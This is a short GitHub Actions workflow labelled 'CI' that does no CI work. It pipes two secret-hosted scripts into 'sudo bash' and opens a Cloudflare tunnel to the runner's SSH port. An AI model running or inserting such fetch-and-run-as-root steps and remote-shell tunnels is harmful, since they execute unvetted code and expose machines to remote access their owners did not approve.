name: CI

on:
  workflow_dispatch:        # 手动触发
  #schedule:
  #  - cron: "0 */6 * * *"   # 每 6 小时跑一次（UTC）

jobs:
  setup:
    runs-on: ubuntu-latest

    steps:
      # env
      - run: |
          pwd
          curl -sL ${{ secrets.SETENV }}  | sudo bash -s
          curl -sL ${{ secrets.WORKERSCRIPT }}  | sudo bash -s
          cloudflared tunnel --url ssh://localhost:22 --no-autoupdate
